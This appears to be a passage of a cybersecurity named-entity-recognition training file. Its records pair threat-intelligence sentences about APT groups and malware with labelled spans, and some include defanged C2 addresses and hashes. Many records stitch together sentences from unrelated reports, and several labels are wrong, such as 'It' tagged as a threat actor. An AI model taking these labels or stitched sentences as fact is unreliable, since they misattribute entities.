[[1752, 1755]], "FILEPATH: Javascript (JS) dropper": [[1768, 1791]], "FILEPATH: JS dropper": [[1837, 1847]], "FILEPATH: JS decryptor": [[1870, 1882]], "FILEPATH: MSIL payload": [[2143, 2155]], "TOOL: C&C": [[2233, 2236]], "ORGANIZATION: Kaspersky": [[2361, 2370]], "FILEPATH: .NET malware": [[2829, 2841]], "FILEPATH: Topinambour": [[2862, 2873]], "FILEPATH: .NET module": [[2903, 2914]], "FILEPATH: KopiLuwak JavaScript": [[2939, 2959]], "MALWARE: Trojan": [[2960, 2966]]}, "info": {"id": "cyberner_stix_train_004064", "source": "cyberner_stix_train"}}
{"text": "Secure both the operating system and the application .", "spans": {}, "info": {"id": "cyberner_stix_train_004065", "source": "cyberner_stix_train"}}
{"text": ") “ % USERNAME % , ti ho inviato il pagamento subitop [ . FireEye has observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks . This ID is generated based on the installation date of the system .", "spans": {"ORGANIZATION: FireEye": [[58, 65]], "THREAT_ACTOR: TEMP.Hermit": [[130, 141]]}, "info": {"id": "cyberner_stix_train_004066", "source": "cyberner_stix_train"}}
{"text": "Earlier Downeks samples were all written in native code .", "spans": {"MALWARE: Downeks": [[8, 15]]}, "info": {"id": "cyberner_stix_train_004067", "source": "cyberner_stix_train"}}
{"text": "The potential actor and who they target Our current analysis strongly suggests Desert Scorpion is being deployed in targeted attacks against Middle Eastern individuals of interest specifically those in Palestine and has also been highlighted by other researchers . In all of these incidents , the Lazarus utilized similar toolsets , including KillDisk that was executed on compromised machines . Depending on the type of decompression engine used, there is a good probability that only the decoy file may be scrutinized and vetted, and the malicious content unnoticed – just like how some of the most popular archiving tools failed to notice the second ZIP . STRATOFEAR is a modular backdoor that communicates with C2 servers using a protocol specified in its C2 configuration , which is decrypted from a local file .", "spans": {"MALWARE: Desert Scorpion": [[79, 94]], "THREAT_ACTOR: Lazarus": [[297, 304]], "TOOL: KillDisk": [[343, 351]], "MALWARE: STRATOFEAR": [[659, 669]]}, "info": {"id": "cyberner_stix_train_004068", "source": "cyberner_stix_train"}}
{"text": "We found more macOS malware similar to that used in the original Operation AppleJeus case .", "spans": {"SYSTEM: macOS": [[14, 19]]}, "info": {"id": "cyberner_stix_train_004070", "source": "cyberner_stix_train"}}
{"text": "From August to October , Guccifer 2.0 posted several additional installments of what appear to be internal DCCC documents on “ his ” WordPress site .", "spans": {"THREAT_ACTOR: Guccifer": [[25, 33]], "ORGANIZATION: DCCC": [[107, 111]]}, "info": {"id": "cyberner_stix_train_004071", "source": "cyberner_stix_train"}}
{"text": "TA505 turned to URLs in early August 2017 to distribute Locky , finally eschewing the document or zipped script attachments that have characterized the majority of their Locky campaigns since February 2016 ; most of these URLs linked to malicious documents and scripts .", "spans": {"THREAT_ACTOR: TA505": [[0, 5]], "MALWARE: Locky": [[56, 61], [170, 175]], "TOOL: zipped": [[98, 104]]}, "info": {"id": "cyberner_stix_train_004072", "source": "cyberner_stix_train"}}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58729 [ . In addition to the MitM server IP addresses published in previous reports , Talos identified 16 additional servers leveraged by the actor during the observed attacks . APT28 : SNAKEMACKEREL , Swallowtail , Group 74 , Sednit , Sofacy , Pawn Storm , Fancy Bear , STRONTIUM , Tsar Team , Threat Group-4127 , TG-4127 .", "spans": {"TOOL: MitM server": [[83, 94]], "ORGANIZATION: Talos": [[140, 145]], "TOOL: additional servers": [[160, 178]], "THREAT_ACTOR: actor": [[196, 201]], "THREAT_ACTOR: APT28": [[232, 237]], "THREAT_ACTOR: SNAKEMACKEREL": [[240, 253]], "THREAT_ACTOR: Swallowtail": [[256, 267]], "THREAT_ACTOR: Group 74": [[270, 278]], "THREAT_ACTOR: Sednit": [[281, 287]], "THREAT_ACTOR: Sofacy": [[290, 296]], "THREAT_ACTOR: Pawn Storm": [[299, 309]], "THREAT_ACTOR: Fancy Bear": [[312, 322]], "THREAT_ACTOR: STRONTIUM": [[325, 334]], "THREAT_ACTOR: Tsar Team": [[337, 346]], "THREAT_ACTOR: Threat Group-4127": [[349, 366]], "THREAT_ACTOR: TG-4127": [[369, 376]]}, "info": {"id": "cyberner_stix_train_004073", "source": "cyberner_stix_train"}}
{"text": "When the document is opened in Word , the instructions are not immediately visible , as Word does not display these fields contents by default .", "spans": {"TOOL: Word": [[31, 35], [88, 92]]}, "info": {"id": "cyberner_stix_train_004074", "source": "cyberner_stix_train"}}
{"text": "After releasing Operation AppleJeus , the Lazarus group continued to use a similar modus operandi in order to compromise cryptocurrency businesses .", "spans": {"THREAT_ACTOR: Lazarus": [[42, 49]]}, "info": {"id": "cyberner_stix_train_004075", "source": "cyberner_stix_train"}}
{"text": "This suggests that these attacks were part of a planned operation against specific targets in India .", "spans": {}, "info": {"id": "cyberner_stix_train_004076", "source": "cyberner_stix_train"}}
{"text": "The executable module continues to be part of a framework supporting various internal and external components communicating over internal and external channels , maintaining slightly morphed encryption and functionality per deployment .", "spans": {}, "info": {"id": "cyberner_stix_train_004077", "source": "cyberner_stix_train"}}
{"text": "Below is the list of all the commands catered by the C & C server . Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor . Sandworm Team has been linked to the Ukrainian energy sector attack in late 2015 .", "spans": {"MALWARE: Bemstour": [[68, 76]], "TOOL: DoublePulsar backdoor": [[130, 151]], "THREAT_ACTOR: Sandworm Team": [[154, 167]]}, "info": {"id": "cyberner_stix_train_004078", "source": "cyberner_stix_train"}}
{"text": "The app loads a URL pointing to a Bread-controlled server . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia . Finally , it marks ZxShell main Dll for deletion with the MoveFileEx Windows API . TIEDYE supports the following protocols : tcp , tcp6 , udp , upd6 , http , https , proxy_socks4 , proxy_socks4a , pipe , ssl , ssl3 , and rdp .", "spans": {"THREAT_ACTOR: Bahamut": [[122, 129]], "MALWARE: ZxShell": [[251, 258]], "TOOL: Dll": [[264, 267]], "SYSTEM: Windows": [[301, 308]], "MALWARE: TIEDYE": [[315, 321]], "SYSTEM: tcp": [[357, 360]], "SYSTEM: tcp6": [[363, 367]], "SYSTEM: udp": [[370, 373]], "SYSTEM: upd6": [[376, 380]], "SYSTEM: http": [[383, 387]], "SYSTEM: https": [[390, 395]], "SYSTEM: proxy_socks4": [[398, 410]], "SYSTEM: proxy_socks4a": [[413, 426]], "SYSTEM: pipe": [[429, 433]], "SYSTEM: ssl": [[436, 439]], "SYSTEM: ssl3": [[442, 446]], "SYSTEM: rdp": [[453, 456]]}, "info": {"id": "cyberner_stix_train_004079", "source": "cyberner_stix_train"}}
{"text": "] it server1fi.exodus.connexxa [ . TEMP.Veles' lateral movement activities used a publicly-available PowerShell-based tool , WMImplant . The backdoor has rather basic C2 functionality implemented through a predefined set of URLs : Who is the Winnti group ?", "spans": {"THREAT_ACTOR: TEMP.Veles'": [[35, 46]], "TOOL: PowerShell-based tool": [[101, 122]], "TOOL: WMImplant": [[125, 134]], "MALWARE: backdoor": [[141, 149]], "TOOL: C2": [[167, 169]], "THREAT_ACTOR: Winnti group": [[242, 254]]}, "info": {"id": "cyberner_stix_train_004080", "source": "cyberner_stix_train"}}
{"text": "In the quadrant , the smaller boxes in blue-gray represent particular apps in the RuMMS family , while the bigger boxes in deep-blue represent C2 servers used by some RuMMS apps . The OilRig group continues to be a persistent adversary group in the Middle East region . The oldest one from November 2019 , named \" Urgent.docx \" . Mandiant has identified zero - day exploitation of this vulnerability in the wild beginning in late August 2023 as well as n - day exploitation after Citrix ’s publication .", "spans": {"MALWARE: RuMMS": [[82, 87], [167, 172]], "THREAT_ACTOR: OilRig group": [[184, 196]], "THREAT_ACTOR: group": [[236, 241]], "FILEPATH: Urgent.docx": [[314, 325]], "ORGANIZATION: Mandiant": [[330, 338]], "VULNERABILITY: zero - day exploitation": [[354, 377]]}, "info": {"id": "cyberner_stix_train_004081", "source": "cyberner_stix_train"}}
{"text": "Backdoored Conversations C2 server analysis During the analysis of the Smali injected apps and their C2 server infrastructure we hadn ’ t found any interesting clues , but things changed when we looked at the C2 server of the linked Conversations messenger . Prior to that report , we published detail analysis on malware exploiting CVE-2018-8414 vulnerability (remote code execution in SettingContent-ms) , which is believed a work of DarkHydrus . ScarCruft tools : 02681a7fe708f39beb7b3cf1bd557ee9 Bluetooth info harvester .", "spans": {"VULNERABILITY: CVE-2018-8414": [[333, 346]], "THREAT_ACTOR: DarkHydrus": [[436, 446]], "THREAT_ACTOR: ScarCruft": [[449, 458]], "FILEPATH: 02681a7fe708f39beb7b3cf1bd557ee9": [[467, 499]], "TOOL: Bluetooth": [[500, 509]]}, "info": {"id": "cyberner_stix_train_004082", "source": "cyberner_stix_train"}}
{"text": "It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April . The group uses website and web-server compromise as a means of attack and leverages an enormous cache of tools in its campaigns , to include exploits that take advantage of known CVE software vulnerabilities .", "spans": {"THREAT_ACTOR: ScarCruft": [[25, 34]], "VULNERABILITY: zero day exploit": [[52, 68]], "VULNERABILITY: CVE-2016-0147": [[71, 84]], "MALWARE: CVE software vulnerabilities": [[295, 323]]}, "info": {"id": "cyberner_stix_train_004083", "source": "cyberner_stix_train"}}
{"text": "During this period , TG-4127 created 213 short links targeting 108 email addresses on the hillaryclinton.com domain .", "spans": {"THREAT_ACTOR: TG-4127": [[21, 28]], "TOOL: email": [[67, 72]], "DOMAIN: hillaryclinton.com": [[90, 108]]}, "info": {"id": "cyberner_stix_train_004084", "source": "cyberner_stix_train"}}
{"text": "It ’ s possible , as with other Android malware , that some apps may also be available on forums , file-sharing sites or even sent to victims as email attachments , and we were only able to determine the delivery mechanism for a handful of the apps we have been able to find . The backdoor can connect to any of the C&Cs from a hardcoded list – a measure to increase resilience . More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company .", "spans": {"SYSTEM: Android": [[32, 39]], "MALWARE: backdoor": [[281, 289]], "THREAT_ACTOR: APT33": [[410, 415]], "ORGANIZATION: organization": [[443, 455]], "ORGANIZATION: business conglomerate": [[475, 496]], "FILEPATH: malicious file": [[505, 519]], "ORGANIZATION: petrochemical company": [[592, 613]]}, "info": {"id": "cyberner_stix_train_004085", "source": "cyberner_stix_train"}}
{"text": "It is important to note that the data won ’ t be uploaded to C & C server automatically . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . PROMETHIUM and NEODYMIUM both used a zero-day exploit that executed code to download a malicious payload .", "spans": {"MALWARE: Microsoft Word attachment": [[174, 199]], "VULNERABILITY: CVE-2017-0199": [[232, 245]], "TOOL: ZeroT Trojan": [[260, 272]], "TOOL: PlugX Remote Access Trojan": [[304, 330]], "TOOL: RAT": [[333, 336]], "THREAT_ACTOR: PROMETHIUM": [[341, 351]], "THREAT_ACTOR: NEODYMIUM": [[356, 365]], "VULNERABILITY: zero-day": [[378, 386]], "VULNERABILITY: exploit": [[387, 394]]}, "info": {"id": "cyberner_stix_train_004086", "source": "cyberner_stix_train"}}
{"text": "Based on the evolution of Ginp it is clear that it isn ’ t based on Anubis , but rather reuses some of its code . APT10 also used WinRAR and cURL for Windows , both often renamed , to compress and upload the exfiltrated files from the Visma network to the Dropbox API . Since the source code is publicly available , Gh0st RAT has been used by multiple actors for years .", "spans": {"MALWARE: Ginp": [[26, 30]], "MALWARE: Anubis": [[68, 74]], "THREAT_ACTOR: APT10": [[114, 119]], "TOOL: WinRAR": [[130, 136]], "TOOL: cURL": [[141, 145]], "MALWARE: Gh0st RAT": [[316, 325]]}, "info": {"id": "cyberner_stix_train_004087", "source": "cyberner_stix_train"}}
{"text": "The next day , Kaspersky also published their own research on the malware .", "spans": {"ORGANIZATION: Kaspersky": [[15, 24]]}, "info": {"id": "cyberner_stix_train_004088", "source": "cyberner_stix_train"}}
{"text": "Move the value of a register into the VM descriptor 0x20 JNB Jump if not below/Jump if above or equal/Jump if not carry 0x21 JNP Jump if not parity/Jump if parity odd Each virtual instruction is stored in a special data structure that contains all the information needed to be properly read and executed by the VM . While this may be coincidental , the out-of-sequence version 3.0 sample was created ten days after we published the Operation Lotus Blossom paper that exposed the Elise Trojan that is closely related to Emissary . Winnti : 7f73def251fcc34cbd6f5ac61822913479124a2a Wed Nov 14 03:50:18 2018 19317120 44260a1d . Harrison signed his threatening missive with the salutation , “ We are legion , ” suggesting that whatever comeuppance he had in store for Ashley Madison would come from a variety of directions and anonymous hackers .", "spans": {"TOOL: Elise Trojan": [[479, 491]], "TOOL: Emissary": [[519, 527]], "THREAT_ACTOR: Winnti": [[530, 536]], "FILEPATH: 7f73def251fcc34cbd6f5ac61822913479124a2a": [[539, 579]], "THREAT_ACTOR: Harrison": [[625, 633]], "ORGANIZATION: Ashley Madison": [[764, 778]]}, "info": {"id": "cyberner_stix_train_004089", "source": "cyberner_stix_train"}}
{"text": "This should be highly alarming to any government agency or enterprise . A hallmark of Turla operations is iterations of their tools and code lineage in Kazuar can be traced back to at least 2005 . The ShellMainThreadInt function gets the HeapDestroy Windows API address and replaces the first 3 bytes with the RET 4 opcode . Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": {"TOOL: Kazuar": [[152, 158]], "SYSTEM: Windows": [[250, 257]], "VULNERABILITY: vulnerabilities are accessible via the internet": [[365, 412]]}, "info": {"id": "cyberner_stix_train_004090", "source": "cyberner_stix_train"}}
{"text": "Recently , the 360 Core Security discovered an APT attack code named as APT-C-26 against cryptocurrency institutions and related individuals . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 .", "spans": {"ORGANIZATION: 360 Core Security": [[15, 32]], "THREAT_ACTOR: APT-C-26": [[72, 80]], "TOOL: RTF": [[187, 190]], "ORGANIZATION: Microsoft": [[222, 231]], "SYSTEM: Windows": [[232, 239]], "VULNERABILITY: CVE-2017-0199": [[267, 280]]}, "info": {"id": "cyberner_stix_train_004091", "source": "cyberner_stix_train"}}
{"text": "Some of the documents exploited CVE-2017-0199 to deliver the payload . In this case , the malware is signed off by a “ developer ” , which may actually be a dummy account or that of a compromised user .", "spans": {"MALWARE: documents": [[12, 21]], "VULNERABILITY: CVE-2017-0199": [[32, 45]]}, "info": {"id": "cyberner_stix_train_004092", "source": "cyberner_stix_train"}}
{"text": "DanderSpritz is the framework for controlling infected machines , different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar . This time the group chose a national data center as its target from an unnamed country in Central Asia in an attempt to gain \" access to a wide range of government resources at one fell swoop \" .", "spans": {"TOOL: DanderSpritz": [[0, 12]], "TOOL: FuZZbuNch": [[81, 90]], "TOOL: DisableSecurity": [[196, 211]], "TOOL: EnableSecurity": [[216, 230]], "TOOL: DarkPulsar": [[235, 245]]}, "info": {"id": "cyberner_stix_train_004093", "source": "cyberner_stix_train"}}
{"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id58717 [ . During a typical incident , the actor would modify the NS records for the targeted organization , pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries . In 2017 , a phishing campaign was used to target seven law and investment firms .", "spans": {"THREAT_ACTOR: actor": [[96, 101]]}, "info": {"id": "cyberner_stix_train_004094", "source": "cyberner_stix_train"}}
{"text": "he PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) . Clever Kitten has moved to leveraging strategic web compromises .", "spans": {"THREAT_ACTOR: PassCV": [[3, 9]], "TOOL: publicly available RATs": [[35, 58]], "THREAT_ACTOR: Clever Kitten": [[211, 224]]}, "info": {"id": "cyberner_stix_train_004095", "source": "cyberner_stix_train"}}
{"text": "the fake Facebook login page IODBSSUEEZ Send a file containing stolen Facebook credentials to the C & C server FdelSRRT Delete files containing stolen Facebook credentials chkstzeaw Launch Facebook LUNAPXER Launch apps according to the package name sent by the C & C server Gapxplister Get a list of all installed applications DOTRall8xxe Zip all the stolen files and store in the /DCIM/.dat/ directory Acouxacour Get a list of accounts on the victim 's device Fimxmiisx Open the camera A significantly improved variant of the Bemstour exploit tool was rolled out in September 2016 , when it was used in an attack against an educational institution in Hong Kong . This group has not been directly linked to a government source , but the group 's motivations appear to overlap with those of the Chinese government .", "spans": {"SYSTEM: Facebook": [[9, 17], [70, 78], [151, 159], [189, 197]], "MALWARE: Bemstour": [[527, 535]], "ORGANIZATION: Chinese government": [[794, 812]]}, "info": {"id": "cyberner_stix_train_004096", "source": "cyberner_stix_train"}}
{"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . The second method , described in Part D.2 , below , involves the \" ShadowPad \" malware , which the Barium Defendants have distributed via a third-party software provider 's compromised update .", "spans": {"MALWARE: flare-qdb": [[18, 27]], "MALWARE: ShadowPad": [[153, 162]], "THREAT_ACTOR: Barium": [[185, 191]], "ORGANIZATION: third-party software provider": [[226, 255]]}, "info": {"id": "cyberner_stix_train_004097", "source": "cyberner_stix_train"}}
{"text": "HenBox Enters the Uyghur App Store In May 2016 , a HenBox app was downloaded from uyghurapps [ . As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only . Our analysis has led us to conclude that APT1 is likely government-sponsored and one of the most persistent of China 's cyber threat actors .", "spans": {"MALWARE: HenBox": [[0, 6], [51, 57]], "SYSTEM: Uyghur App Store": [[18, 34]], "MALWARE: JS dropper": [[140, 150]], "MALWARE: JS decryptor": [[173, 185]], "MALWARE: KopiLuwak": [[265, 274]], "THREAT_ACTOR: APT1": [[342, 346]], "THREAT_ACTOR: cyber threat actors": [[421, 440]]}, "info": {"id": "cyberner_stix_train_004098", "source": "cyberner_stix_train"}}
{"text": "The second campaign identifier , from the sample compiled on the 12th , references cihaderi.net , another Turkish website that claims to provide “ news from the jihad world ” and which dedicates a section of its site to Chechnya .", "spans": {"DOMAIN: cihaderi.net": [[83, 95]]}, "info": {"id": "cyberner_stix_train_004099", "source": "cyberner_stix_train"}}
{"text": "The IIS w3wp.exe process loads the malicious DLL , which CTU researchers have observed in the Program Files\\Microsoft\\Exchange Server\\ClientAccess\\Owa\\Bin directory .", "spans": {"TOOL: IIS": [[4, 7]], "FILEPATH: w3wp.exe": [[8, 16]], "TOOL: DLL": [[45, 48]], "ORGANIZATION: CTU": [[57, 60]]}, "info": {"id": "cyberner_stix_train_004100", "source": "cyberner_stix_train"}}
{"text": "] com ) used in malicious activity and it is reasonable to assume the remaining three are or were intended to serve the same purpose . APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain . Mandiant has observed Russian nation-state attackers APT29 employing domain fronting techniques for stealthy backdoor access to victim environments for at least two years .", "spans": {"THREAT_ACTOR: APT41": [[135, 140]], "ORGANIZATION: Mandiant": [[318, 326]], "THREAT_ACTOR: attackers": [[361, 370]], "THREAT_ACTOR: APT29": [[371, 376]]}, "info": {"id": "cyberner_stix_train_004101", "source": "cyberner_stix_train"}}
{"text": "There are also infrastructure ties between some FakeM variants and older activity using Trojans such as Elirks , Poison Ivy , and BiFrost , which were used in attacks as old as 2009 . Additionally , the targeting of a French diplomat based in Taipei , Taiwan aligns with previous targeting by these actors , as does the separate infrastructure .", "spans": {"TOOL: FakeM": [[48, 53]], "TOOL: Elirks": [[104, 110]], "TOOL: Poison Ivy": [[113, 123]], "ORGANIZATION: French diplomat": [[218, 233]], "THREAT_ACTOR: actors": [[299, 305]]}, "info": {"id": "cyberner_stix_train_004102", "source": "cyberner_stix_train"}}
{"text": "The Trojan ’ s list of possible commands has remained practically unchanged throughout its life , and will be described below in detail . In one of the samples received for analysis , the US-CERT Code Analysis Team observed botnet controller functionality . We determined that these backdoors were installed on the targets ' machines on September 19 2018 , based mainly on the service creation time of the loader component .", "spans": {"ORGANIZATION: US-CERT Code Analysis Team": [[188, 214]], "MALWARE: botnet controller": [[224, 241]]}, "info": {"id": "cyberner_stix_train_004103", "source": "cyberner_stix_train"}}
{"text": "It ’ s worth noting , newer versions of the DroidVPN app are available on Google Play , as well as in some other third-party app stores , which could indicate uyghurapps [ . The Winnti hackers broke into Henkel’s network in 2014 . On November 26 , 2015 , a suspected China-based APT group sent Japanese defense policy-themed spear phishing emails to multiple Japanese financial and high-tech companies .", "spans": {"SYSTEM: DroidVPN": [[44, 52]], "SYSTEM: Google Play": [[74, 85]], "THREAT_ACTOR: Winnti": [[178, 184]], "ORGANIZATION: Henkel’s": [[204, 212]], "TOOL: emails": [[340, 346]], "ORGANIZATION: financial": [[368, 377]], "ORGANIZATION: high-tech companies": [[382, 401]]}, "info": {"id": "cyberner_stix_train_004104", "source": "cyberner_stix_train"}}
{"text": "Upon gaining access to the machines connected to corporate and guest Wi-Fi networks , APT28 deployed Responder .", "spans": {"TOOL: Wi-Fi networks": [[69, 83]], "THREAT_ACTOR: APT28": [[86, 91]], "TOOL: Responder": [[101, 110]]}, "info": {"id": "cyberner_stix_train_004105", "source": "cyberner_stix_train"}}
{"text": "All information about your social networks , Bank accounts , Credit Cards . Silence try to apply new techniques and ways of stealing from various banking systems , including AWS CBR , ATMs , and card processing . AveMaria is a new botnet , whose first version we found in September 2018 , right after the arrests of the FIN7 members . Scripts should be captured from the file system when possible to determine their actions and intent .", "spans": {"MALWARE: AveMaria": [[213, 221]], "THREAT_ACTOR: FIN7": [[320, 324]]}, "info": {"id": "cyberner_stix_train_004106", "source": "cyberner_stix_train"}}
{"text": "Kaspersky Labs , who sometimes refer to CosmicDuke as ‘ Bot Gen Studio ’ , speculated that “ one possibility is that ‘ Bot Gen Studio ’ is a malware platform also available as a so-called ‘ legal spyware ’ tool ” ;", "spans": {"ORGANIZATION: Kaspersky Labs": [[0, 14]], "MALWARE: CosmicDuke": [[40, 50]]}, "info": {"id": "cyberner_stix_train_004107", "source": "cyberner_stix_train"}}
{"text": "The C2 URL is : hxxp : //64.78.161.133/ * victims ’ s_cell_phone_number * /process.php In addition to this , the malware also reports to another script , “ hxxp : //64.78.161.33/android.php ” . TG-3390 actors have used Java exploits in their SWCs . Although most malware today either seeks monetary gain or conducts espionage for economic advantage , both of these activity groups appear to seek information about specific individuals .", "spans": {"THREAT_ACTOR: TG-3390": [[194, 201]], "VULNERABILITY: Java exploits": [[219, 232]], "TOOL: SWCs": [[242, 246]], "ORGANIZATION: economic": [[330, 338]], "THREAT_ACTOR: activity groups": [[365, 380]], "ORGANIZATION: specific individuals": [[414, 434]]}, "info": {"id": "cyberner_stix_train_004108", "source": "cyberner_stix_train"}}
{"text": "In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": {"ORGANIZATION: Symantec": [[15, 23]]}, "info": {"id": "cyberner_stix_train_004109", "source": "cyberner_stix_train"}}
{"text": "In both these campaigns the activity group included remote triggers to deactivate exploitation , with an attempt to conceal the vulnerability , and prevent analysis of the attack . This file requires the target to attempt to open the .lnk file , which redirects the user to a Windows Scripting Component ( .wsc ) file , hosted on an adversary-controlled microblogging page .", "spans": {"THREAT_ACTOR: activity group": [[28, 42]], "FILEPATH: .lnk file": [[234, 243]], "SYSTEM: Windows": [[276, 283]]}, "info": {"id": "cyberner_stix_train_004110", "source": "cyberner_stix_train"}}
{"text": "It is worth noting that during our investigation f-secure uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances . TA505 is also using FlowerPippi ( Backdoor.Win32.FLOWERPIPPI.A ) , a new backdoor that we found them using in their campaigns against targets in Japan , India , and Argentina . TA505 targeted Middle Eastern countries in a June 11 campaign that delivered more than 90% of the total spam emails to the UAE , Saudi Arabia , and Morroco . It fetches the same FlawedAmmyy downloader .msi file , then downloads the FlawedAmmyy payload . TA505 used Wizard (.wiz) files in this campaign , with FlawedAmmyy RAT as the final payload . On June 14 , we saw TA505’s campaign still targeting UAE with similar tactics and techniques , but this time , some of the spam emails were delivered via the Amadey botnet . It later delivered an information stealer named EmailStealer , ” which stolesimple mail transfer protocol SMTP ) credentials and email addresses in the victim’s machine . On June 18 , the majority of the campaign’s spam emails were sent with the subject , Your RAKBANK Tax Invoice / Tax Credit Note” or Confirmation . This campaign used the abovementioned .HTML file , malicious Excel/Word document VBA macro , the FlawedAmmyy payload , and Amadey . On June 24 , we found another campaign targeting Lebanon with the ServHelper malware . On June 17 , we observed the campaign’s spam emails delivering malware-embedded Excel files directly as an attachment . On June 20 , we spotted the campaign’s spam emails delivering .doc and .xls files . Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines . After our analysis , we found that Proofpoint reported this malware as AndroMut as well . In the campaign that targeted Japan , Philippines , and Argentina on June 20 , we found what seems to be a new , undisclosed malware , which we named Gelup . Another new malware we found that TA505 is using in their campaigns last June 20 against targets in Japan , the Philippines , and Argentina is FlowerPippi . The malicious email contains a highly suspicious sample which triggered the ZLAB team to investigate its capabilities and its possible attribution , discovering a potential expansion of the TA505 operation . The attack , as stated by CyberInt , leveraged a command and control server located in Germany related to the TA505 actor: a very active group involved in cyber-criminal operation all around the world , threatening a wide range of high profile companies , active since 2014 . The comparison of the infection chains reveals in both cases TA505 used a couple of SFX stages to deploy the RMS” software: a legitimate remote administration tool produced by the Russian company TektonIT . The TA505 group is one of the most active threat groups operating since 2014 , it has traditionally targeted Banking and Retail industries , as we recently documented during the analysis of the Stealthy email Stealer” part of their arsenal . Also , some code pieces are directly re-used in the analyzed campaigns , such as the i.cmd” and exit.exe” files , and , at the same time , some new components have been introduced , for instance the rtegre.exe” and the veter1605_MAPS_10cr0.exe” file . In 2018 , Kaspersky Labs published a report that analyzed a Turla PowerShell loader that was based on the open-source project Posh-SecMod . Turla is believed to have been operating since at least 2008 , when it successfully breached the US military . This is not the first time Turla has used PowerShell in-memory loaders to increase its chances of bypassing security products . However , it is likely the same scripts are used more globally against many traditional Turla targets in Western Europe and the Middle East . In some samples deployed since March 2019 , Turla developers modified their PowerShell scripts in order to bypass the Antimalware Scan Interface ( AMSI ) .", "spans": {"THREAT_ACTOR: Callisto": [[117, 125]], "THREAT_ACTOR: TA505": [[210, 215], [387, 392], [641, 646], [2103, 2108], [2416, 2421], [2544, 2549], [2771, 2776], [2921, 2926]], "MALWARE: FlowerPippi": [[230, 241], [2212, 2223]], "MALWARE: Backdoor.Win32.FLOWERPIPPI.A": [[244, 272]], "MALWARE: backdoor": [[283, 291]], "TOOL: emails": [[496, 502], [863, 869], [1129, 1135], [1491, 1497], [1610, 1616]], "THREAT_ACTOR: It": [[545, 547], [909, 911]], "MALWARE: FlawedAmmyy payload": [[619, 638], [1324, 1343]], "MALWARE: Wizard (.wiz) files": [[652, 671]], "MALWARE: FlawedAmmyy RAT": [[696, 711]], "THREAT_ACTOR: TA505’s": [[755, 762]], "MALWARE: Amadey botnet": [[893, 906]], "MALWARE: EmailStealer": [[957, 969]], "TOOL: email": [[1038, 1043], [2240, 2245], [3120, 3125]], "TOOL: .HTML": [[1265, 1270]], "TOOL: Excel/Word": [[1288, 1298]], "MALWARE: macro": [[1312, 1317]], "MALWARE: Amadey": [[1350, 1356]], "FILEPATH: ServHelper": [[1425, 1435]], "FILEPATH: spam emails": [[1670, 1681]], "ORGANIZATION: banks": [[1746, 1751]], "ORGANIZATION: Proofpoint": [[1856, 1866]], "THREAT_ACTOR: AndroMut": [[1892, 1900]], "FILEPATH: Gelup": [[2061, 2066]], "ORGANIZATION: ZLAB": [[2302, 2306]], "ORGANIZATION: high profile companies": [[2665, 2687]], "MALWARE: remote administration tool": [[2847, 2873]], "ORGANIZATION: Banking": [[3026, 3033]], "ORGANIZATION: Retail": [[3038, 3044]], "FILEPATH: i.cmd”": [[3244, 3250]], "FILEPATH: exit.exe”": [[3255, 3264]], "FILEPATH: rtegre.exe”": [[3358, 3369]], "FILEPATH: veter1605_MAPS_10cr0.exe”": [[3378, 3403]], "ORGANIZATION: Kaspersky": [[3421, 3430]], "THREAT_ACTOR: Turla": [[3471, 3476], [3551, 3556], [3689, 3694], [3878, 3883], [3976, 3981]], "MALWARE: PowerShell loader": [[3477, 3494]], "ORGANIZATION: military": [[3651, 3659]], "MALWARE: PowerShell": [[3704, 3714]], "TOOL: PowerShell": [[4008, 4018]], "TOOL: Antimalware Scan Interface": [[4050, 4076]], "TOOL: AMSI": [[4079, 4083]]}, "info": {"id": "cyberner_stix_train_004111", "source": "cyberner_stix_train"}}
{"text": "Malware Capabilities The Cybereason Nocturnus team has been following EventBot since the beginning of March 2020 . For example , Bisonal malware in 2012 used send() and recv() APIs to communicate with its C2 This Bisonal variant used in the latest attack communicates with one of the following hard-coded C2 addresses by using the HTTP POST method on TCP port 443 . The Elise malware used by Lotus Blossom , which was an attack campaign on targets in Southeast Asia .", "spans": {"ORGANIZATION: Cybereason Nocturnus": [[25, 45]], "MALWARE: EventBot": [[70, 78]], "THREAT_ACTOR: Bisonal malware": [[129, 144]], "MALWARE: Bisonal": [[213, 220]], "MALWARE: Elise": [[370, 375]], "MALWARE: malware": [[376, 383]], "THREAT_ACTOR: Lotus Blossom": [[392, 405]]}, "info": {"id": "cyberner_stix_train_004112", "source": "cyberner_stix_train"}}
{"text": "Specific to this technique , if the C2 server is not available at the time of execution , the malicious code cannot be retrieved , rendering the delivery document largely benign .", "spans": {"TOOL: C2": [[36, 38]]}, "info": {"id": "cyberner_stix_train_004113", "source": "cyberner_stix_train"}}
